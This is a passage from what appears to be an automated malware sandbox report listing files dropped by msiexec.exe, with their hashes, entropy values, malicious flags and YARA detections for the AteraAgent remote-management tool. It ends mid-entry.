                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.06933753910613097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOS6Up3s0tGyVky6l3X:2F0i8n0itFzDHFS6Q80tE3X
                                                                                                                                                                                                                                                                                                                                  MD5:EE6C9C4CE73CF06A832D9D6CDF144455
                                                                                                                                                                                                                                                                                                                                  SHA1:8A37888B82161D3D89C7D086D8B3FB47D7880314
                                                                                                                                                                                                                                                                                                                                  SHA-256:7800E5FA5BFA56310692B68C24621B44AD205CA04C5AA1A263ADE954FE97A142
                                                                                                                                                                                                                                                                                                                                  SHA-512:D10B5BBDB0753AF8F102388AAF119655DF603384F3FB99687DB9ED25F73868292618702394B136F5F662F8CFB012EA84F24B0B60F038C58976E2722E04ADEC45
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6260B0A6EE189872.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6770E5F65DEE8E27.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5652099008809222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:kk8PhluRc06WXJunT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:yhl1FnT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:4E836F3DC1F6DD87B0B768970901FB58
                                                                                                                                                                                                                                                                                                                                  SHA1:BD5142D32B62A69699501118885819ED7CFC41F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A740CB63701F6F99CBF01E7ECA2A5AAD3F0A27E547BB50838DD024281766973
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9C7B777D4C8FF60DFE3D7325ECD0AA9B057C23697000843B964D9B6A942EC7CA11C8E4AF0E721AC8F7FE80DAAC6F6B3FC657275E7FAA898CF36F1BA6097D6FC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6B3BD24D01329A5D.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF80F0F0EF5EAF0872.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.15754443212956704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KyuBEuSsndddPSjndddwEqdGUDjxbQ9IdXy:Puv9f3DtUgC
                                                                                                                                                                                                                                                                                                                                  MD5:FFD8FF5F083A6ED75AFB5E6CD484C1E5
                                                                                                                                                                                                                                                                                                                                  SHA1:9CAD924ADFE1D84A31E35FA83E8559BFEFD756E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:A7FF3C693BBF3940EA4F22C6CB85BF8D7378FA4C563256C0A2B4B180F8851161
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACEAF80CCCB6D974DDC4944A6D64608F42989E0C4C9965ED5C9BA39D8212576F407E7D89F3C0C95192D574C31C8479CCFC65F3689B2D388439487DF2C66F2B22
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8959754CB5C77D85.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5701014991086903
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:r8PhFuRc06WXz+FT5Sdm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:ShF1jFT8m3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:9E9CA92874801068799CF975C6C84F90
                                                                                                                                                                                                                                                                                                                                  SHA1:233CD27A9FE22100D0DBBBB47BD8970E30106962
                                                                                                                                                                                                                                                                                                                                  SHA-256:15C0CD0E4D28938F1EF82D1EF0F12BCE0175E53A1BA1F1B9F7CDEA661A143A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:83C5A56BE85A743CF3BB8DBEFFD889E900555CCA765FC9BFDAA53AE309BF3FB15A97812C1AC2832A37E6528288D1C23DEEEC5BFA1940F79A95960230AAA01091
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8C6157FE5230C8C7.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5652099008809222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:kk8PhluRc06WXJunT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:yhl1FnT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:4E836F3DC1F6DD87B0B768970901FB58
                                                                                                                                                                                                                                                                                                                                  SHA1:BD5142D32B62A69699501118885819ED7CFC41F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A740CB63701F6F99CBF01E7ECA2A5AAD3F0A27E547BB50838DD024281766973
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9C7B777D4C8FF60DFE3D7325ECD0AA9B057C23697000843B964D9B6A942EC7CA11C8E4AF0E721AC8F7FE80DAAC6F6B3FC657275E7FAA898CF36F1BA6097D6FC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8F3A4106A89D3FAA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3015028554555976
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jx/jO38PhMuh3iFip1GE2yza2t4KAQBHofagUMClXte/+oAWS+HesXwZymiL:A8PhMuRc06WXOCFT5aXAWSiXwZy9
                                                                                                                                                                                                                                                                                                                                  MD5:2A5B227715CA7D8BE6719C9EAE981221
                                                                                                                                                                                                                                                                                                                                  SHA1:863D008A637B38524033BAED0F4324A04668FAE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:305504B686A4848F0E09C804E97C48DCBAB789334DE7B75F7AB4E85EE20A9891
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4EC0B7D7028C8A1E211EA39BE693A57F7FD1E24BFD7DA90DB8A40834088F3E348CA8FC73FBEB753925F583F6246F07C409B8A16D164FC779A8903F1C290A94E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF98A3B0A404DB694E.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.14497609063976058
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:8+FRpFBEuipVGndYipV5nd/EVgdGSLMCltMClMbgNlGPQbQk/+DdMClh+FvFS:979EuSsndYSjnd/EqdGUDjxbQ+Mdm3
                                                                                                                                                                                                                                                                                                                                  MD5:F7BF09AA75259012B8752C95923173E7
                                                                                                                                                                                                                                                                                                                                  SHA1:5FA40B96F09B2515603EED15C3CDF4128AA98C83
                                                                                                                                                                                                                                                                                                                                  SHA-256:D9F31E56CA352189E384810E98E10E189869B26730DEBD54F57394574CDBE82F
                                                                                                                                                                                                                                                                                                                                  SHA-512:95B83EE111C0A27E5E9694A24393D250FE7767AD204BC21CD99BA5FD40EB5D5F4A0EAFDA0D0011242EBD2F5537F0A8BEE2BE612CEBC938C29E4FE6B13314A4DE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF98EF70557B828906.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07408621563822465
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO16KUJJDVPsMggIXKVky6l1:2F0i8n0itFzDHFcJJFg/p1
                                                                                                                                                                                                                                                                                                                                  MD5:69616F6B87DCE1AE106AFC4BAFAE8BAC
                                                                                                                                                                                                                                                                                                                                  SHA1:1FB9D074C25F93DC3393FB8436FCAD95C4437CA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:2008C7721143B4D962FD1F7985A17EFCA826EB54D263D8030C8DF382DBD6C5D0
                                                                                                                                                                                                                                                                                                                                  SHA-512:03F27A60747CC75094293B252802294C77D37FF98B58B48C6BE09D895F1D66D19E2085F4CECD6435E26E87ABC29610AF1CEA5745A96A2BBC0BD2889370EB4A20
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
